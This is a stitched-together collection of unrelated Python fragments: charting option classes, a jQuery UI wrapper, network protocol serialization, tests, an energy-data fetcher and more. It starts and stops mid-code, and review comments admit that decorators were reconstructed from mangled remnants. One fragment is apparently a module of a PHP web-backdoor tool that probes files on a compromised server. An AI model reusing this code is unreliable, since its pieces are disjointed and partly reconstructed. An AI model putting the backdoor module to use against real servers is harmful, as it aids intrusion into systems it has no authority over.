    def pop(self, task_id):
        """Remove and return the task_info for *task_id* ({} when absent)."""
        task_info = self.get(task_id)
        if (task_info is None):
            return {}
        self.delete(task_id)
        return task_info
class Check(Module):
    """Remote file-check module: probes a path on the target via PHP vectors.

    Each vector templates ``${rpath}`` into a small PHP payload; the
    ``check`` argument selects which probe to run. Payload strings are part
    of the wire protocol — keep them byte-exact.
    """

    def init(self):
        self.register_info({'author': ['Emilio Pinna'], 'license': 'GPLv3'})
        # Shared permissions payload: prints a subset of "erwx" depending on
        # which tests pass for the remote path.
        payload_perms = ("$f='${rpath}';if(_exists($f)){print('e');if(_readable($f))print('r');" + "if(_writable($f))print('w');if(_executable($f))print('x');}")
        self.register_vectors([
            # Boolean probes post-process the "erwx" output into True/False.
            PhpCode(payload_perms, 'exists', postprocess=(lambda x: (True if ('e' in x) else False))),
            PhpCode("print(md5_file('${rpath}'));", 'md5'),
            # Raw permissions string (e.g. "erw").
            PhpCode(payload_perms, 'perms'),
            PhpCode(payload_perms, 'readable', postprocess=(lambda x: (True if ('r' in x) else False))),
            PhpCode(payload_perms, 'writable', postprocess=(lambda x: (True if ('w' in x) else False))),
            PhpCode(payload_perms, 'executable', postprocess=(lambda x: (True if ('x' in x) else False))),
            PhpCode("print(is_file('${rpath}') ? 1 : 0);", 'file', postprocess=(lambda x: (True if (x == '1') else False))),
            PhpCode("print(is_dir('${rpath}') ? 1 : 0);", 'dir', postprocess=(lambda x: (True if (x == '1') else False))),
            PhpCode("print(filesize('${rpath}'));", 'size', postprocess=(lambda x: utils.prettify.format_size(int(x)))),
            # Raw mtime (epoch int) vs. formatted local datetime string.
            PhpCode("print(filemtime('${rpath}'));", 'time', postprocess=(lambda x: int(x))),
            PhpCode("print(filemtime('${rpath}'));", 'datetime', postprocess=(lambda x: datetime.datetime.fromtimestamp(float(x)).strftime('%Y-%m-%d %H:%M:%S'))),
            PhpCode("print(realpath('${rpath}'));", 'abspath')
        ])
        self.register_arguments([{'name': 'rpath', 'help': 'Target path'}, {'name': 'check', 'choices': self.vectors.get_names()}])

    def run(self, **kwargs):
        """Execute the selected vector with the module arguments."""
        return self.vectors.get_result(name=self.args['check'], format_args=self.args)
class Menu(JQueryUI):
    """Python wrapper over the jQuery UI menu widget API.

    Every method renders a ``$(...).menu(...)`` JavaScript expression
    against the owning component's jQuery variable.
    """

    def _invoke(self, fragment):
        """Build a ``menu(<fragment>)`` call expression for this component."""
        return JsObjects.JsObjects.get('%s.menu(%s)' % (self.component.dom.jquery.varId, fragment))

    def blur(self):
        """Remove focus from the menu."""
        return self._invoke('"blur"')

    def collapse(self):
        """Close the currently active sub-menu."""
        return self._invoke('"collapse"')

    def collapseAll(self):
        """Close all open sub-menus (null event, all=true)."""
        return self._invoke('"collapseAll", null, true')

    def destroy(self):
        """Remove the menu functionality completely."""
        return self._invoke('"destroy"')

    def disable(self):
        """Disable the menu."""
        return self._invoke('"disable"')

    def enable(self):
        """Enable the menu."""
        return self._invoke('"enable"')

    def expand(self):
        """Open the sub-menu below the active item."""
        return self._invoke('"expand"')

    def instance(self):
        """Return the menu widget instance object."""
        return self._invoke('"instance"')

    def isFirstItem(self):
        """Boolean expression: is the active item the first one?"""
        return JsObjects.JsBoolean.JsBoolean('%s.menu("isFirstItem")' % self.component.dom.jquery.varId)

    def isLastItem(self):
        """Boolean expression: is the active item the last one?"""
        return JsObjects.JsBoolean.JsBoolean('%s.menu("isLastItem")' % self.component.dom.jquery.varId)

    def next(self):
        """Activate the next menu item."""
        return self._invoke('"next"')

    def nextPage(self):
        """Move active state one page of items forward."""
        return self._invoke('"nextPage"')

    def option(self, data=None, value=None):
        """Get all options, get one option, or set an option.

        With no arguments returns the full options object; with *data* only
        it reads that option; with both it sets *data* to *value*.
        """
        if data is None:
            return self._invoke('"option"')
        data = JsUtils.jsConvertData(data, None)
        if value is None:
            return self._invoke('"option", %s' % data)
        value = JsUtils.jsConvertData(value, None)
        return self._invoke('"option", %s, %s' % (data, value))

    def previous(self):
        """Activate the previous menu item."""
        return self._invoke('"previous"')

    def previousPage(self):
        """Move active state one page of items backward."""
        return self._invoke('"previousPage"')

    def refresh(self):
        """Re-process items added or removed since initialization."""
        return self._invoke('"refresh"')

    def select(self):
        """Select the currently active item."""
        return self._invoke('"select"')
class CommentInserter(gast.NodeVisitor):
    """Re-attach '#' comment lines from the original source text into a
    gast AST as CommentLine nodes, each placed before the first node that
    follows it in line order.
    """

    def __init__(self, tree, code):
        self.tree = tree
        # Parent links are needed later to splice a comment into the body
        # list of the node that follows it.
        self.ancestors = beniget.Ancestors()
        self.ancestors.visit(tree)
        self.code = code
        self.lines = code.split('\n')
        self.lines_comments = []   # comment text, in source order
        self.lineno_comments = []  # matching 1-based line numbers
        for (index, line) in enumerate(self.lines):
            if line.strip().startswith('#'):
                self.lineno_comments.append((index + 1))
                self.lines_comments.append(line)
        if (not self.lineno_comments):
            return  # no comments: leave the tree untouched
        self.last_line_comment = max(self.lineno_comments)
        self.index_comment = 0
        self.node_after = {}   # comment lineno -> first node on a later line
        self.node_before = []  # node visited just before each comment
        self.previous_node = None
        self._done = False
        self.visit(tree)
        # Key node_before by comment lineno to mirror node_after's shape.
        self.node_before = {self.lineno_comments[index]: node_before for (index, node_before) in enumerate(self.node_before)}
        self.modify_tree()

    def visit(self, node):
        """One traversal recording, for each comment line, the first node
        whose lineno exceeds it (node_after) and the node visited just
        before that (node_before). Stops once the last comment is paired."""
        if self._done:
            return
        if (hasattr(node, 'lineno') and (node.lineno is not None)):
            linenos = self.lineno_comments
            # A single node may close out several consecutive comments.
            while (node.lineno > linenos[self.index_comment]):
                self.node_after[linenos[self.index_comment]] = node
                if (linenos[self.index_comment] == self.last_line_comment):
                    self._done = True
                    return
                self.index_comment += 1
            while (len(self.node_after) > len(self.node_before)):
                self.node_before.append(self.previous_node)
        self.previous_node = node
        super().visit(node)

    def modify_tree(self):
        """Insert a CommentLine node into the tree for every comment found."""
        for (lineno, line) in zip(self.lineno_comments, self.lines_comments):
            try:
                node_after = self.node_after[lineno]
            except KeyError:
                # Trailing comment with no following node: append at module end.
                self.tree.body.append(CommentLine(line, lineno))
                continue
            else:
                self.insert_comment_in_parent_before_node(line, lineno, node_after)
                continue
            # NOTE(review): both branches above end in `continue`, so the
            # node_before/Module handling below is unreachable dead code —
            # it looks intended for comments preceding the first statement;
            # confirm intent before removing or re-enabling.
            try:
                node_before = self.node_before[lineno]
            except KeyError:
                pass
            else:
                if isinstance(node_before, gast.Module):
                    self.tree.body.insert(0, CommentLine(line, lineno))

    def insert_comment_in_parent_before_node(self, line, lineno, node):
        """Splice the comment into the parent's list field just before node."""
        parent = self.ancestors.parent(node)
        comment = line.strip()
        for (field, value) in gast.iter_fields(parent):
            if isinstance(value, list):
                if (node in value):
                    index = value.index(node)
                    value.insert(index, CommentLine(comment, lineno))
class OptionPlotoptionsVariwideStates(Options):
    """Variwide series ``states`` configuration (hover/inactive/normal/select).

    NOTE(review): the ``@property`` decorators were reconstructed to match
    the getter/setter property style used by the sibling generated option
    classes in this file (``.setter`` remnants elsewhere) — confirm
    against the upstream generator output.
    """

    @property
    def hover(self) -> 'OptionPlotoptionsVariwideStatesHover':
        """Sub-options applied when the series is hovered."""
        return self._config_sub_data('hover', OptionPlotoptionsVariwideStatesHover)

    @property
    def inactive(self) -> 'OptionPlotoptionsVariwideStatesInactive':
        """Sub-options applied when the series is inactive."""
        return self._config_sub_data('inactive', OptionPlotoptionsVariwideStatesInactive)

    @property
    def normal(self) -> 'OptionPlotoptionsVariwideStatesNormal':
        """Sub-options for the series' normal state."""
        return self._config_sub_data('normal', OptionPlotoptionsVariwideStatesNormal)

    @property
    def select(self) -> 'OptionPlotoptionsVariwideStatesSelect':
        """Sub-options applied when the series is selected."""
        return self._config_sub_data('select', OptionPlotoptionsVariwideStatesSelect)
# NOTE(review): decorator prefix reconstructed — the source remnant
# `.parametrize(...)` is not valid syntax on its own.
@pytest.mark.parametrize('elasticapm_client', [{'debug': True}], indirect=True)
def test_instrumentation_debug_client_debug(flask_apm_client):
    """With client debug=True, a transaction is still recorded even though
    the Flask app runs in debug mode."""
    flask_apm_client.app.debug = True
    assert len(flask_apm_client.client.events[TRANSACTION]) == 0
    resp = flask_apm_client.app.test_client().post('/users/', data={'foo': 'bar'})
    resp.close()
    assert len(flask_apm_client.client.events[TRANSACTION]) == 1
class RobotArm(Boxes):
    """Generator for a segmented robot arm: up to five segments, each with
    a selectable segment type, one or two servos, and a length."""

    ui_group = 'Part'

    def __init__(self) -> None:
        Boxes.__init__(self)
        self.addSettingsArgs(edges.FingerJointSettings)
        # One group of four arguments per arm segment (1..5).
        for i in range(1, 6):
            robot_arg = robot.RobotArg(True)
            servo_arg = servos.ServoArg()
            self.argparser.add_argument(
                '--type%i' % i, action='store', type=robot_arg,
                default='none', choices=robot_arg.choices(),
                help='type of arm segment')
            self.argparser.add_argument(
                '--servo%ia' % i, action='store', type=servo_arg,
                default='Servo9g', choices=servo_arg.choices(),
                help='type of servo to use')
            self.argparser.add_argument(
                '--servo%ib' % i, action='store', type=servo_arg,
                default='Servo9g', choices=servo_arg.choices(),
                help='type of servo to use on second side (if different is supported)')
            self.argparser.add_argument(
                '--length%i' % i, action='store', type=float, default=50.0,
                help='length of segment axle to axle')

    def render(self):
        """Draw the configured segments, outermost (5) first."""
        for i in reversed(range(1, 6)):
            segment_type = getattr(self, 'type%i' % i)
            segment_length = getattr(self, 'length%i' % i)
            servo_name_a = getattr(self, 'servo%ia' % i)
            servo_name_b = getattr(self, 'servo%ib' % i)
            arm_cls = getattr(robot, segment_type, None)
            if not arm_cls:
                # 'none' (or unknown) segment type: nothing to draw.
                continue
            servo_cls_a = getattr(servos, servo_name_a)
            servo_cls_b = getattr(servos, servo_name_b)
            arm_cls(self, servo_cls_a(self), servo_cls_b(self))(segment_length, move='up')
class MemoryEth1PeerTracker(SQLiteEth1PeerTracker):
    """Eth1 peer tracker backed by an in-memory SQLite database.

    Identical to SQLiteEth1PeerTracker except that nothing is persisted,
    which makes it suitable for tests and throwaway sessions.
    """

    def __init__(self,
                 genesis_hash: Hash32 = None,
                 protocols: Tuple[str, ...] = None,
                 protocol_versions: Tuple[int, ...] = None,
                 network_id: int = None) -> None:
        # ':memory:' tells SQLite to keep the whole database in RAM.
        in_memory_session = get_tracking_database(Path(':memory:'))
        super().__init__(in_memory_session, genesis_hash, protocols, protocol_versions, network_id)
class bsn_gentable_entry_stats_request(bsn_stats_request):
    """Big Switch Networks experimenter stats request for gentable entry
    statistics (OpenFlow wire version 5).

    NOTE(review): auto-generated LOXI-style serialization code; ``pack``
    joins str padding with ``struct.pack`` output, so it reads as
    Python 2 byte-string code — confirm before running under Python 3.
    """

    version = 5            # OpenFlow wire protocol version
    type = 18              # stats request message type
    stats_type = 65535     # experimenter stats
    experimenter = 6035143 # Big Switch Networks experimenter id
    subtype = 3

    def __init__(self, xid=None, flags=None, table_id=None, checksum=None, checksum_mask=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (flags != None):
            self.flags = flags
        else:
            self.flags = 0
        if (table_id != None):
            self.table_id = table_id
        else:
            self.table_id = 0
        if (checksum != None):
            self.checksum = checksum
        else:
            self.checksum = 0
        if (checksum_mask != None):
            self.checksum_mask = checksum_mask
        else:
            self.checksum_mask = 0
        return

    def pack(self):
        """Serialize to wire format; the length field (slot 2) is
        back-patched once the total message size is known."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.stats_type))
        packed.append(struct.pack('!H', self.flags))
        packed.append(('\x00' * 4))  # pad
        packed.append(struct.pack('!L', self.experimenter))
        packed.append(struct.pack('!L', self.subtype))
        packed.append(struct.pack('!H', self.table_id))
        packed.append(('\x00' * 2))  # pad
        packed.append(util.pack_checksum_128(self.checksum))
        packed.append(util.pack_checksum_128(self.checksum_mask))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    # NOTE(review): takes no `self` and builds a fresh object — reads like
    # a @staticmethod whose decorator was lost in extraction; confirm.
    def unpack(reader):
        """Deserialize from wire format, asserting the fixed header fields."""
        obj = bsn_gentable_entry_stats_request()
        _version = reader.read('!B')[0]
        assert (_version == 5)
        _type = reader.read('!B')[0]
        assert (_type == 18)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Restrict the reader to this message's payload (header already read).
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _stats_type = reader.read('!H')[0]
        assert (_stats_type == 65535)
        obj.flags = reader.read('!H')[0]
        reader.skip(4)
        _experimenter = reader.read('!L')[0]
        assert (_experimenter == 6035143)
        _subtype = reader.read('!L')[0]
        assert (_subtype == 3)
        obj.table_id = reader.read('!H')[0]
        reader.skip(2)
        obj.checksum = util.unpack_checksum_128(reader)
        obj.checksum_mask = util.unpack_checksum_128(reader)
        return obj

    def __eq__(self, other):
        # Field-wise equality over the mutable message fields only.
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.flags != other.flags):
            return False
        if (self.table_id != other.table_id):
            return False
        if (self.checksum != other.checksum):
            return False
        if (self.checksum_mask != other.checksum_mask):
            return False
        return True

    def pretty_print(self, q):
        """Write a human-readable dump of the message to pretty-printer q."""
        q.text('bsn_gentable_entry_stats_request {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPSF_REQ_MORE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('table_id = ')
                q.text(('%#x' % self.table_id))
                q.text(',')
                q.breakable()
                q.text('checksum = ')
                q.pp(self.checksum)
                q.text(',')
                q.breakable()
                q.text('checksum_mask = ')
                q.pp(self.checksum_mask)
            q.breakable()
        q.text('}')
class ListClosedWorkflowExecutionsRequest(betterproto.Message):
    """Request message (betterproto-generated) for listing closed workflow
    executions in a namespace, with paging and optional filtering.

    NOTE(review): generated protobuf bindings are normally decorated as
    dataclasses — a class decorator may have been lost in extraction;
    confirm against the generator output.
    """

    namespace: str = betterproto.string_field(1)
    # Maximum number of executions returned per page.
    maximum_page_size: int = betterproto.int32_field(2)
    # Opaque continuation token from a previous response.
    next_page_token: bytes = betterproto.bytes_field(3)
    start_time_filter: v1filter.StartTimeFilter = betterproto.message_field(4)
    # The three fields below share the protobuf `oneof` group 'filters':
    # at most one of them may be set on a given request.
    execution_filter: v1filter.WorkflowExecutionFilter = betterproto.message_field(5, group='filters')
    type_filter: v1filter.WorkflowTypeFilter = betterproto.message_field(6, group='filters')
    status_filter: v1filter.StatusFilter = betterproto.message_field(7, group='filters')
class OptionPlotoptionsLineSonificationDefaultinstrumentoptionsMappingLowpassResonance(Options):
    """Low-pass filter resonance mapping options (line series sonification).

    NOTE(review): the @property/@x.setter decorators were reconstructed —
    without them each getter is shadowed by the same-named setter
    definition (``.setter`` remnants elsewhere in this file show this was
    the original pattern); confirm against upstream.
    """

    @property
    def mapFunction(self):
        """Get the configured ``mapFunction`` option."""
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        """Get the configured ``mapTo`` option."""
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        """Get the configured ``max`` option."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """Get the configured ``min`` option."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        """Get the configured ``within`` option."""
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesBoxplotData(Options):
    """Per-point configuration for a boxplot series.

    NOTE(review): the @property/@x.setter decorators were reconstructed —
    the source shows bare ``.setter`` remnants (e.g. before ``q1``/``q3``)
    and duplicate same-name getter/setter definitions, which only make
    sense as properties; confirm against upstream.
    """

    @property
    def accessibility(self) -> 'OptionSeriesBoxplotDataAccessibility':
        """Accessibility sub-options for this data point."""
        return self._config_sub_data('accessibility', OptionSeriesBoxplotDataAccessibility)

    @property
    def boxDashStyle(self):
        """Dash style of the box (default 'Solid')."""
        return self._config_get('Solid')

    @boxDashStyle.setter
    def boxDashStyle(self, text: str):
        self._config(text, js_type=False)

    @property
    def className(self):
        """CSS class name for the point."""
        return self._config_get(None)

    @className.setter
    def className(self, text: str):
        self._config(text, js_type=False)

    @property
    def color(self):
        """Color of the point."""
        return self._config_get(None)

    @color.setter
    def color(self, text: str):
        self._config(text, js_type=False)

    @property
    def colorIndex(self):
        """Color index of the point."""
        return self._config_get(None)

    @colorIndex.setter
    def colorIndex(self, num: float):
        self._config(num, js_type=False)

    @property
    def custom(self):
        """Arbitrary custom data attached to the point."""
        return self._config_get(None)

    @custom.setter
    def custom(self, value: Any):
        self._config(value, js_type=False)

    @property
    def dataLabels(self) -> 'OptionSeriesBoxplotDataDatalabels':
        """Data-label sub-options for this point."""
        return self._config_sub_data('dataLabels', OptionSeriesBoxplotDataDatalabels)

    @property
    def description(self):
        """Description of the point."""
        return self._config_get(None)

    @description.setter
    def description(self, text: str):
        self._config(text, js_type=False)

    @property
    def dragDrop(self) -> 'OptionSeriesBoxplotDataDragdrop':
        """Drag & drop sub-options for this point."""
        return self._config_sub_data('dragDrop', OptionSeriesBoxplotDataDragdrop)

    @property
    def drilldown(self):
        """Id of the drilldown series linked to this point."""
        return self._config_get(None)

    @drilldown.setter
    def drilldown(self, text: str):
        self._config(text, js_type=False)

    @property
    def events(self) -> 'OptionSeriesBoxplotDataEvents':
        """Event handler sub-options for this point."""
        return self._config_sub_data('events', OptionSeriesBoxplotDataEvents)

    @property
    def high(self):
        """The 'high' (upper whisker) value."""
        return self._config_get(None)

    @high.setter
    def high(self, num: float):
        self._config(num, js_type=False)

    @property
    def id(self):
        """Id of the point."""
        return self._config_get(None)

    @id.setter
    def id(self, text: str):
        self._config(text, js_type=False)

    @property
    def labelrank(self):
        """Rank deciding label display priority."""
        return self._config_get(None)

    @labelrank.setter
    def labelrank(self, num: float):
        self._config(num, js_type=False)

    @property
    def low(self):
        """The 'low' (lower whisker) value."""
        return self._config_get(None)

    @low.setter
    def low(self, num: float):
        self._config(num, js_type=False)

    @property
    def median(self):
        """The median value."""
        return self._config_get(None)

    @median.setter
    def median(self, num: float):
        self._config(num, js_type=False)

    @property
    def medianDashStyle(self):
        """Dash style of the median line (default 'Solid')."""
        return self._config_get('Solid')

    @medianDashStyle.setter
    def medianDashStyle(self, text: str):
        self._config(text, js_type=False)

    @property
    def name(self):
        """Name of the point."""
        return self._config_get(None)

    @name.setter
    def name(self, text: str):
        self._config(text, js_type=False)

    @property
    def q1(self):
        """The lower quartile value."""
        return self._config_get(None)

    @q1.setter
    def q1(self, num: float):
        self._config(num, js_type=False)

    @property
    def q3(self):
        """The upper quartile value."""
        return self._config_get(None)

    @q3.setter
    def q3(self, num: float):
        self._config(num, js_type=False)

    @property
    def selected(self):
        """Whether the point is initially selected (default False)."""
        return self._config_get(False)

    @selected.setter
    def selected(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def stemDashStyle(self):
        """Dash style of the stem (default 'Solid')."""
        return self._config_get('Solid')

    @stemDashStyle.setter
    def stemDashStyle(self, text: str):
        self._config(text, js_type=False)

    @property
    def whiskerDashStyle(self):
        """Dash style of the whiskers (default 'Solid')."""
        return self._config_get('Solid')

    @whiskerDashStyle.setter
    def whiskerDashStyle(self, text: str):
        self._config(text, js_type=False)

    @property
    def x(self):
        """The x value of the point."""
        return self._config_get(None)

    @x.setter
    def x(self, num: float):
        self._config(num, js_type=False)

    @property
    def y(self):
        """The y value of the point."""
        return self._config_get(None)

    @y.setter
    def y(self, num: float):
        self._config(num, js_type=False)
# NOTE(review): decorator reconstructed from the mangled
# `_frequency(timedelta(days=1))` remnant; confirm the import name.
@refetch_frequency(timedelta(days=1))
def fetch_production(zone_key: str = 'NL', session: (Session | None) = None, target_datetime: (datetime | None) = None, logger: Logger = getLogger(__name__)):
    """Estimate NL production by attributing the gap between consumption
    plus net imports and reported ENTSOE production to 'unknown', then
    attach solar/wind capacity estimates.

    Returns the production events whose 'unknown' share is positive, or
    None when any upstream fetch comes back empty.
    """
    if target_datetime is None:
        target_datetime = arrow.utcnow().datetime
    r = session or Session()
    consumptions = ENTSOE.fetch_consumption(zone_key=zone_key, session=r, target_datetime=target_datetime, logger=logger)
    if not consumptions:
        return
    for c in consumptions:
        del c['source']
    df_consumptions = pd.DataFrame.from_dict(consumptions)
    df_consumptions['datetime'] = df_consumptions['datetime'].apply(lambda x: x.replace(tzinfo=UTC))
    # Collect net exchanges with all neighbouring zones.
    exchanges = []
    for exchange_key in ['BE', 'DE', 'GB', 'NO-NO2']:
        zone_1, zone_2 = sorted([exchange_key, zone_key])
        exchange = ENTSOE.fetch_exchange(zone_key1=zone_1, zone_key2=zone_2, session=r, target_datetime=target_datetime, logger=logger)
        if not exchange:
            return
        exchanges.extend(exchange or [])
    # The DK-DK1 interconnector only counts after 2019-08-24; its data is
    # sub-hourly, so average it down to hourly before merging.
    if target_datetime > arrow.get('2019-08-24', 'YYYY-MM-DD'):
        zone_1, zone_2 = sorted(['DK-DK1', zone_key])
        df_dk = pd.DataFrame(DK.fetch_exchange(zone_key1=zone_1, zone_key2=zone_2, session=r, target_datetime=target_datetime, logger=logger))
        df_dk['datetime'] = df_dk['datetime'].dt.floor('H')
        exchange_DK = df_dk.groupby(['datetime']).aggregate({'netFlow': 'mean', 'sortedZoneKeys': 'max', 'source': 'max'}).reset_index()
        exchange_DK = exchange_DK.round({'netFlow': 3})
        exchanges.extend(exchange_DK.to_dict(orient='records'))
    # Normalize each exchange into an NL_import column (positive = import).
    for e in exchanges:
        if e['sortedZoneKeys'].startswith('NL->'):
            e['NL_import'] = -1 * e['netFlow']
        else:
            e['NL_import'] = e['netFlow']
        del e['source']
        del e['netFlow']
    df_exchanges = pd.DataFrame.from_dict(exchanges)
    df_exchanges['datetime'] = df_exchanges['datetime'].apply(lambda x: x.replace(tzinfo=UTC))
    # Sum all interconnectors per timestamp.
    df_exchanges = df_exchanges.groupby('datetime').sum()
    # NOTE(review): this join aligns df_consumptions' RangeIndex against
    # df_exchanges' datetime index — looks suspicious; confirm the
    # intended alignment key.
    df_consumptions_with_exchanges = df_consumptions.join(df_exchanges).fillna(method='ffill', limit=3)
    df_total_generations = df_consumptions_with_exchanges['consumption'] - df_consumptions_with_exchanges['NL_import']
    productions = ENTSOE.fetch_production(zone_key=zone_key, session=r, target_datetime=target_datetime, logger=logger)
    if not productions:
        return
    for p in productions:
        if ('unknown' not in p['production']) or (p['production']['unknown'] is None):
            p['production']['unknown'] = 0
        # Attribute any shortfall vs. total generation to 'unknown'.
        Z = sum([(x or 0) for x in p['production'].values()])
        if (p['datetime'] in df_total_generations) and (Z < df_total_generations[p['datetime']]):
            p['production']['unknown'] = round((df_total_generations[p['datetime']] - Z) + p['production']['unknown'], 3)
    solar_capacity_df = get_solar_capacities()
    wind_capacity_df = get_wind_capacities()
    for p in productions:
        p['capacity'] = {'solar': round(get_solar_capacity_at(p['datetime'], solar_capacity_df), 3), 'wind': round(get_wind_capacity_at(p['datetime'], wind_capacity_df), 3)}
    return [p for p in productions if p['production']['unknown'] > 0]
def extractCleverneckoHomeBlog(item):
    """Map a 'cleverneckohome' feed item to a release message.

    Returns None for filtered/unparseable items, a release message for a
    recognized series tag, or False when no tag matches.
    """
    disallowed = ['movie review', 'badword']
    if any(bad in item['tags'] for bad in disallowed):
        return None
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # (tag on the post, canonical series name, translation type)
    tagmap = [
        ('your husbands leg is broken', 'your husbands leg is broken', 'translated'),
        ('the case of the 27 knife stabs', 'the case of the 27 knife stabs', 'translated'),
        ('Fate', 'Fate, something so wonderful', 'translated'),
        ('kimi no shiawase wo negatteita', 'kimi no shiawase wo negatteita', 'translated'),
        ('warm waters', 'warm waters', 'translated'),
        ('after being marked by a powerful love rival', 'after being marked by a powerful love rival', 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def test_is_valid_opcode_valid_with_PUSH32_just_past_boundary():
    """A PUSH32 (0x7f) at offset 0 consumes the next 32 bytes as immediate
    data, so only positions 0 and 33 hold executable opcodes."""
    stream = CodeStream(b'\x7f' + b'\x00' * 32 + b'`')
    assert stream.is_valid_opcode(0) is True
    # Offsets 1..32 are PUSH32 immediate data, not opcodes.
    for offset in range(1, 33):
        assert stream.is_valid_opcode(offset) is False
    assert stream.is_valid_opcode(33) is True
    # Past the end of the code.
    assert stream.is_valid_opcode(34) is False
def process_r(N):
    """Return (x, factors): an integer x roughly in [N//2, N] together with
    its prime factorization as a list.

    NOTE(review): recursive rejection sampler in the style of Kalai's
    algorithm for generating random factored numbers — confirm the
    intended distribution. Below 2**threshold_bits it falls back to
    factoring a uniform draw directly.
    """
    if (N < (2 ** threshold_bits)):
        # Small case: draw x uniformly from (N//2, N] and factor it directly.
        x = ((gmpy2.mpz_random(random_state, ((N + 1) // 2)) + (N // 2)) + 1)
        return (x, factor_N(x))
    while True:
        # Sample a prime power q = p**alpha, recurse on the reduced bound,
        # and accept x = y*q with probability log(N/2)/log(x).
        (p, alpha) = process_f(N)
        q = (p ** alpha)
        Nprime = int((N // q))
        (y, yf) = process_r(Nprime)
        x = (y * q)
        l = gmpy2.mpfr_random(random_state)
        if (l < (gmpy2.log((N // 2)) / gmpy2.log(x))):
            return (x, (([p] * alpha) + yf))
# NOTE(review): decorator prefix reconstructed — the source remnant
# `.parametrize(...)` is not valid syntax on its own.
@pytest.mark.parametrize('PKs, aggregate_signature, message, result', [(*compute_aggregate_signature(SKs=[1], message=sample_message), sample_message, True), (*compute_aggregate_signature(SKs=tuple(range(1, 5)), message=sample_message), sample_message, True), ([], Z2_SIGNATURE, sample_message, False), ([G2ProofOfPossession.SkToPk(1), Z1_PUBKEY], G2ProofOfPossession.Sign(1, sample_message), sample_message, False)])
def test_fast_aggregate_verify(PKs, aggregate_signature, message, result):
    """FastAggregateVerify accepts valid aggregates and rejects empty key
    lists and aggregates containing the point at infinity."""
    assert G2ProofOfPossession.FastAggregateVerify(PKs, message, aggregate_signature) == result
def get_adr_commission_votes(case_id):
    """Fetch the commission vote records for an ADR case.

    Returns a list of dicts with vote_date, action, commissioner_name and
    vote_type, one per vote row.
    """
    with db.engine.connect() as conn:
        result = conn.execute(ADR_COMMISSION_VOTES, case_id)
        return [
            {
                'vote_date': row['vote_date'],
                'action': row['action'],
                'commissioner_name': row['commissioner_name'],
                'vote_type': row['vote_type'],
            }
            for row in result
        ]
class OptionPlotoptionsSplineSonificationDefaultinstrumentoptionsActivewhen(Options):
    """'activeWhen' options for spline series sonification instruments.

    NOTE(review): the @property/@x.setter decorators were reconstructed —
    without them each getter is shadowed by the same-named setter
    definition (``.setter`` remnants elsewhere in this file show this was
    the original pattern); confirm against upstream.
    """

    @property
    def crossingDown(self):
        """Get the configured ``crossingDown`` option."""
        return self._config_get(None)

    @crossingDown.setter
    def crossingDown(self, num: float):
        self._config(num, js_type=False)

    @property
    def crossingUp(self):
        """Get the configured ``crossingUp`` option."""
        return self._config_get(None)

    @crossingUp.setter
    def crossingUp(self, num: float):
        self._config(num, js_type=False)

    @property
    def max(self):
        """Get the configured ``max`` option."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """Get the configured ``min`` option."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def prop(self):
        """Get the configured ``prop`` option."""
        return self._config_get(None)

    @prop.setter
    def prop(self, text: str):
        self._config(text, js_type=False)
# NOTE(review): registration decorator reconstructed from the mangled
# `_tasks('spacy.TextCat.v1')` remnant — confirm the registry attribute name.
@registry.llm_tasks('spacy.TextCat.v1')
def make_textcat_task(parse_responses: Optional[TaskResponseParser[TextCatTask]] = None,
                      prompt_example_type: Optional[Type[FewshotExample]] = None,
                      labels: str = '',
                      examples: ExamplesConfigType = None,
                      normalizer: Optional[Callable[[str], str]] = None,
                      exclusive_classes: bool = False,
                      allow_none: bool = True,
                      verbose: bool = False,
                      scorer: Optional[Scorer] = None) -> 'TextCatTask':
    """Factory for the v1 text-classification LLM task.

    Splits the comma-separated ``labels`` string, materializes few-shot
    examples (``examples`` may be a callable returning them), and builds a
    TextCatTask with the v1 default template and response parser unless
    overridden.
    """
    labels_list = split_labels(labels)
    raw_examples = examples() if callable(examples) else examples
    example_type = prompt_example_type or TextCatExample
    textcat_examples = [example_type(**eg) for eg in raw_examples] if raw_examples else None
    return TextCatTask(
        parse_responses=parse_responses or parse_responses_v1_v2_v3,
        prompt_example_type=example_type,
        labels=labels_list,
        template=DEFAULT_TEXTCAT_TEMPLATE_V1,
        prompt_examples=textcat_examples,
        normalizer=normalizer,
        exclusive_classes=exclusive_classes,
        allow_none=allow_none,
        verbose=verbose,
        label_definitions=None,
        scorer=scorer or score,
    )
def zone2offset(tz, dt):
    """Resolve a timezone spec to an offset in minutes.

